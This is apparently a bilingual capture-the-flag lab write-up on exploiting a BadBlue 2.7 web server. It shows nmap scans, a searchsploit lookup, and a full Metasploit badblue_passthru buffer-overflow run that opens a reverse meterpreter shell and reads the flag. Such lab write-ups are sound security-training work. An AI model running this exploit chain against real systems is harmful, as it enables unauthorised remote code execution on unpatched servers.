Vulnerability Research Lab(漏洞研究实验室)
1
Target IP Address: 10.4.31.112
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nmap -sV 10.4.31.112
PORT STATE SERVICE VERSION
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
1
10.4.31.112/ext.dll?mfcisapicommand=loadpage&page=index.htx
搜索
1
badblue 2.7 cve
BadBlue 2.72b 及更早版本的 ext.dll 中的 PassThru 功能中基于堆栈的缓冲区溢出允许远程攻击者通过长查询字符串执行任意代码。
在exploit database中搜索badblue 2.7,点击BadBlue 2.72b - PassThru Buffer Overflow (Metasploit)。
或者是查看手动利用模块BadBlue 2.72 - PassThru Remote Buffer Overflow
1
2
3
4
5
6
7
8
9
10
11
12
msfconsole
search badblue 2.7
use exploit/windows/http/badblue_passthru
info
set payload windows/meterpreter/reverse_tcp
set rhosts 10.4.31.112
ip a
set lhost eth1
show options
run
meterpreter > sysinfo
Windows: Easy File Sharing Server(Windows:简易文件共享服务器)
概述
Kali GUI 机器和运行易受攻击的简单文件共享服务器的目标机器提供给您。目标机器的 IP 地址在 Kali 机器桌面 (/root/Desktop/target) 上名为 target 的文本文件中提供。
你的任务是使用 Kali 机器上可用的工具对应用程序进行指纹识别,然后使用适当的 Metasploit 模块利用应用程序。
目标:利用应用程序并检索标志!
说明:
- 你的 Kali 机器有一个 IP 地址为 10.10.XY 的接口 运行 “ip addr” 来知道 X 和 Y 的值。
- 目标机器的 IP 地址在文件 “/root/Desktop/target” 中提到
- 不要攻击位于 IP 地址 192.VW1 和 10.10.X.1 的网关
我自己的思路
A Kali GUI machine and a target machine running a vulnerable easy file sharing server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.
Objective:Exploit the application and retrieve the flag!
1
Target IP Address : 10.0.20.210
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@attackdefense:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
32780: eth0@if32781: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:01:00:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.1.0.10/16 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
32782: eth1@if32783: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:0a:15:05 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.10.21.5/24 brd 10.10.21.255 scope global eth1
valid_lft forever preferred_lft forever
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@attackdefense:~# nmap 10.0.20.210
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-29 14:55 IST
Nmap scan report for 10.0.20.210
Host is up (0.0036s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49175/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 5.71 seconds
在tcp 80端口上运行着http服务,版本是BadBlue httpd 2.7。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@attackdefense:~# nmap 10.0.20.210 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-29 14:56 IST
Nmap scan report for 10.0.20.210
Host is up (0.0036s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.53 seconds
BadBlue 2.72b PassThru Buffer Overflow
1
http://10.0.20.210/ext.dll?mfcisapicommand=loadpage&page=index.htx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@attackdefense:~# searchsploit badblue 2.7
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
BadBlue 2.72 - PassThru Remote Buffer Overflow | exploits/windows/remote/4784.pl
BadBlue 2.72b - Multiple Vulnerabilities | exploits/windows/remote/4715.txt
BadBlue 2.72b - PassThru Buffer Overflow (Metasploit) | exploits/windows/remote/16806.rb
Working Resources BadBlue 1.2.7 - Denial of Service | exploits/windows/dos/20641.txt
Working Resources BadBlue 1.2.7 - Full Path Disclosure | exploits/windows/remote/20640.txt
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
msf5 > use exploit/windows/http/badblue_passthru
msf5 exploit(windows/http/badblue_passthru) > show options
Module options (exploit/windows/http/badblue_passthru):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 BadBlue EE 2.7 Universal
msf5 exploit(windows/http/badblue_passthru) > set rhosts 10.0.28.107
rhosts => 10.0.28.107
msf5 exploit(windows/http/badblue_passthru) > ip a
[*] exec: ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
32886: eth0@if32887: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:01:00:15 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.1.0.21/16 brd 10.1.255.255 scope global eth0
valid_lft forever preferred_lft forever
32888: eth1@if32889: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:0a:15:08 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.10.21.8/24 brd 10.10.21.255 scope global eth1
valid_lft forever preferred_lft forever
msf5 exploit(windows/http/badblue_passthru) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/badblue_passthru) > show options
Module options (exploit/windows/http/badblue_passthru):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.28.107 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 BadBlue EE 2.7 Universal
msf5 exploit(windows/http/badblue_passthru) > set lhost eth1
lhost => 10.10.21.8
msf5 exploit(windows/http/badblue_passthru) > exploit
[*] Started reverse TCP handler on 10.10.21.8:4444
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (180291 bytes) to 10.0.28.107
[*] Meterpreter session 1 opened (10.10.21.8:4444 -> 10.0.28.107:49275) at 2022-08-29 16:55:28 +0530
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > search -f flag*
Found 2 results...
c:\flag.txt (32 bytes)
c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (481 bytes)
meterpreter > cat c:\\flag.txt
70a569da306697d64fc6c19afea37d94
meterpreter > shell
Process 1616 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\BadBlue\EE>type c:\flag.txt
type c:\flag.txt
70a569da306697d64fc6c19afea37d94
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1944.pdf
